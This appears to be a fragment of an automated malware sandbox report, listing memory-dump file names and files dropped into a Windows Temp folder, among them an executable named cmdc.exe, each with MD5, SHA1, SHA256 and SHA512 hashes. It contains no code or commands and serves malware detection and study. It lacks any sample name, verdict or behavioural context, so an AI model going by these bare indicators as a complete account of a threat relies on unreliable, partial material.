memory/600-131-0x0000000000400000-0x0000000000458000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\holderwb.txt
| MD5 | f94dc819ca773f1e3cb27abbc9e7fa27 |
| SHA1 | 9a7700efadc5ea09ab288544ef1e3cd876255086 |
| SHA256 | a3377ade83786c2bdff5db19ff4dbfd796da4312402b5e77c4c63e38cc6eff92 |
| SHA512 | 72a2c10d7a53a7f9a319dab66d77ed65639e9aa885b551e0055fc7eaf6ef33bbf109205b42ae11555a0f292563914bc6edb63b310c6f9bda9564095f77ab9196 |
memory/3952-133-0x0000000000000000-mapping.dmp
memory/3952-138-0x0000022142EE0000-0x0000022142EE2000-memory.dmp
memory/3952-139-0x0000022142EE3000-0x0000022142EE5000-memory.dmp
memory/3952-140-0x000002215B1B0000-0x000002215B1B1000-memory.dmp
memory/3952-143-0x000002215B360000-0x000002215B361000-memory.dmp
memory/3952-144-0x000002215B2F0000-0x000002215B2F1000-memory.dmp
memory/3952-151-0x000002215B3E0000-0x000002215B3E1000-memory.dmp
memory/3952-152-0x0000022142EE6000-0x0000022142EE8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp.txt
| MD5 | c416c12d1b2b1da8c8655e393b544362 |
| SHA1 | fb1a43cd8e1c556c2d25f361f42a21293c29e447 |
| SHA256 | 0600d59103840dff210778179fdfba904dcb737a4bfdb35384608698c86ea046 |
| SHA512 | cb6d3636be4330aa2fd577c3636d0b7165f92ee817e98f21180ba0c918eb76f4e38f025086593a0e508234ca981cfec2c53482b0e9cc0acfa885fefbdf89913c |
memory/3776-155-0x0000000000000000-mapping.dmp
memory/1300-156-0x0000000000000000-mapping.dmp
memory/2528-157-0x0000000000000000-mapping.dmp
memory/2976-158-0x0000000000000000-mapping.dmp
memory/652-159-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\cmdc.exe
| MD5 | 54e8ded7b148a13d3363ac7b33f6eb06 |
| SHA1 | 63dcbe2db9cc14564eb84d5e953f2f9f5c54acd9 |
| SHA256 | 400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342 |
| SHA512 | bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349 |
C:\Users\Admin\AppData\Local\Temp\cmdc.cfg
| MD5 | 70e69155b8080b5db35191ab8426d084 |
| SHA1 | 383deaaee90ce71b28b0a6e22124e77aa1cccf8b |
| SHA256 | 104e0212403148a018258ef005a64ec73f0a148dbee230cb5c91dd691d03aefe |
| SHA512 | c718c69454e4d9bcac24c918bf4c7f05ab93910b8a4701bd1dc914a9ca13dffe5f083f30881b5796d239c11be2f8b3e38a7e2ac7dcabc3d9810f59d9228bf342 |
memory/3956-163-0x0000000000000000-mapping.dmp
memory/1528-164-0x0000000000000000-mapping.dmp
memory/3496-165-0x0000000000000000-mapping.dmp
memory/4004-166-0x0000000000000000-mapping.dmp
memory/980-167-0x0000000000000000-mapping.dmp
memory/1804-168-0x0000000000000000-mapping.dmp